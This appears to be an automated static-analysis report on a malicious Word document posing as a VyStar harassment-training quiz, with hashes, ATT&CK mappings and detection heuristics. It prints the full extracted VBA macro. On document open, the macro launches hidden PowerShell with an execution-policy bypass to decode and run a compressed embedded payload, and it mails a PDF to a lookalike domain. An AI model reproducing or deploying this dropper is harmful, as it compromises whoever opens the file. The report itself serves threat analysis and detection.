Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 719be89a297907cf…

MALICIOUS

Office (OLE)

64.5 KB Created: 2017-12-12 21:58:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: c0eb9aca5e01d4cbc3ac83a285b10502 SHA-1: fcebfe860ce0165017455c76680849b7b5393249 SHA-256: 719be89a297907cf45633b0f605db02263a9b3db7585743e870aae2529188d3e
278 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample contains a VBA macro that executes upon opening the document, as indicated by the Document_Open and OLE_VBA_AUTOEXEC_EXEC heuristics. This macro references PowerShell and uses the Shell() function, strongly suggesting it downloads and executes a second-stage payload. The document body presents a fake training quiz to lure the user into enabling macros.

Heuristics 9

  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (xt4)
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    If Arch = "AMD64" Then
        fp2 = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
    Else
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set OutApp = CreateObject("Outlook.Application")
        Set OutMail = OutApp.CreateItem(0)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Control = "Submit, 0, 0, MSForms, CommandButton"
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Arch = Environ("PROCESSOR_ARCHITECTURE")
    windir = Environ("windir")
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4060 bytes
SHA-256: 657fb53c9a6565b3c713805d12c38c7b3caf1c1ffaf2ecaf926e30cf2d3961d6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Submit, 0, 0, MSForms, CommandButton"
Private Sub Document_Open()

Dim fp2 As String
Dim fp1 As String
Dim xt4 As String

Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
    fp2 = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
    fp2 = "powershell.exe"
End If

fp1 = "nVRtc9pGEP7Or9jRXGekMZLFi90YjWfi4LihDY5riJ2WYTqHtKALpz"
fp1 = fp1 + "v5dMJgwn/vCquYfO0XnXa1t8+zu8+KPcElvHcak2spB1mujX"
fp1 = fp1 + "WdJRqFstMOEikdbwp5OZMihsJySweuLX2HgbJ31sCDMLbk8k"
fp1 = fp1 + "pKHbu1T+ZXSWKwKJpQCmUheR6JF6yN+WsspdJqvMnf3HdGW4"
fp1 = fp1 + "ytF/1vLn2D3OI4pSN54/JqX1lrxKy0eETK8nj5yuwQTD5jD+"
fp1 = fp1 + "wP7jtueIaEdbi8x6ISbiRfHEe+og0SKsN537Bms2UJddi5+t"
fp1 = fp1 + "C//njz26fB7398Ht5+ufvzfjT++vD47a+/+SxOcL5IxfelzJ"
fp1 = fp1 + "TOn0xhy9XzevMSttqd7tn5r+8unGCs+yk3V8bwjes15qWKK3"
fp1 = fp1 + "SIXbbytmDQltQH150Qu8l0Cmz18w34AUPkRWnQ/zL7Tm0Gf1"
fp1 = fp1 + "RmXkAP+AXCdSsMwccnuGh7u7fsFrZsXrF3olYQdH7MNRUXp7"
fp1 = fp1 + "7ep6BvJ5fAkom7QOsbrhKdgZ/xtcgoK0uCz6gWNvWmu6jmx+"
fp1 = fp1 + "bRUXaELeRGx9Rq2E54RXTK1gRHjxNg/+wiQJUQhTWxL0gNNS"
fp1 = fp1 + "5sXYXP/xn3e1wvUKQF19vtjgAWWyDG4DJxGUZMgC8tnHfp7e"
fp1 = fp1 + "TE27KUkGzElhVgQggYAdQF0hUJgvguKa6oAtKKkYxAzMGlnh"
fp1 = fp1 + "eeB4euUwTB1oZzsfr21aEyJ7dogxGalYjxTtNYhlzxBZppr1"
fp1 = fp1 + "d50fTRWDEXtAn4wKVI9nLqcylnJEvC3DJrStxFLCPjlgquBz"
fp1 = fp1 + "faFBazoEr/iLO+FKhs1GBZ8ImEh6YISL6uUxZofMJT1mmCM9"
fp1 = fp1 + "QvQkp+2g1C4q+znMBmkioejgYf4TxoRfAoqI/PBdyOPceLmC"
fp1 = fp1 + "LQRQSTDxuLe0HlVRuy4Fo/K6l5cs0td53U2rzonZ6etYOzs6"
fp1 = fp1 + "DdagXt9kWv2+2cMuWA12CabhEfv9p00gZmMzTXOBdK7CfEns"
fp1 = fp1 + "C/pc0Ch+A7bQd8RVaR8xhh77mpZ1mAn/OisKkpG2x9yXSv99"
fp1 = fp1 + "OfJ2yyvNZbM1x3wjCkoxt60aRu132prMgwoEVFo/N6MEUw5K"
fp1 = fp1 + "ZIuaSp9HW+cVnehLAJk9d9nrpsTXtERqftel4TDiBVaXTl+I"
fp1 = fp1 + "dDiE22blZHWO2bLq2vSkmi2f9U/JFEzGntMNak6nfn3TDc0f"
fp1 = fp1 + "DjdLv7Fw=="

xt4 = fp2 + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
xt4 = xt4 + "and ""Invoke-Expression $(New-Object IO.StreamRea"
xt4 = xt4 + "der ($(New-Object IO.Compression.DeflateStream ("
xt4 = xt4 + "$(New-Object IO.MemoryStream (,$([Convert]::From"
xt4 = xt4 + "Base64String(\"" " & fp1 & " \"" )))), [IO.Compr"
xt4 = xt4 + "ession.CompressionMode]::Decompress)), [Text.Enc"
xt4 = xt4 + "oding]::ASCII)).ReadToEnd();"""

Shell (xt4)


End Sub



Sub Mail_Workbook_1(vPath As String)
    Dim OutApp As Object
    Dim OutMail As Object

    Set OutApp = CreateObject("Outlook.Application")
    Set OutMail = OutApp.CreateItem(0)

    On Error Resume Next

    With OutMail
        .To = "hr.training@vystar.training"
        .CC = ""
        .BCC = ""
        .Subject = "VyStar Sexual Harassment & Diversity Training"
        .Body = "I have completed the sexual harassment & diversity training!"
        .Attachments.Add vPath
        .Send
    End With
    On Error GoTo 0

    Set OutMail = Nothing
    Set OutApp = Nothing
MsgBox "Your training has been submitted successfully!", vbOKOnly, "Thank you"

End Sub


Private Sub Submit_Click()
    Dim vDoc As Object
    
    Dim vPath As String
    
    vPath = ActiveDocument.Path & Application.PathSeparator & "VyStar_SHD_Training.pdf"
    ActiveDocument.ExportAsFixedFormat OutputFileName:=vPath, _
        ExportFormat:=wdExportFormatPDF, OpenAfterExport:=False, OptimizeFor:= _
        wdExportOptimizeForPrint, Range:=wdExportAllDocument, From:=1, To:=1, _
        Item:=wdExportDocumentWithMarkup, IncludeDocProps:=False, KeepIRM:=True, _
        CreateBookmarks:=wdExportCreateNoBookmarks, DocStructureTags:=True, _
        BitmapMissingFonts:=True, UseISO19005_1:=False
    
    Call Mail_Workbook_1(vPath)
    
    Kill vPath
End Sub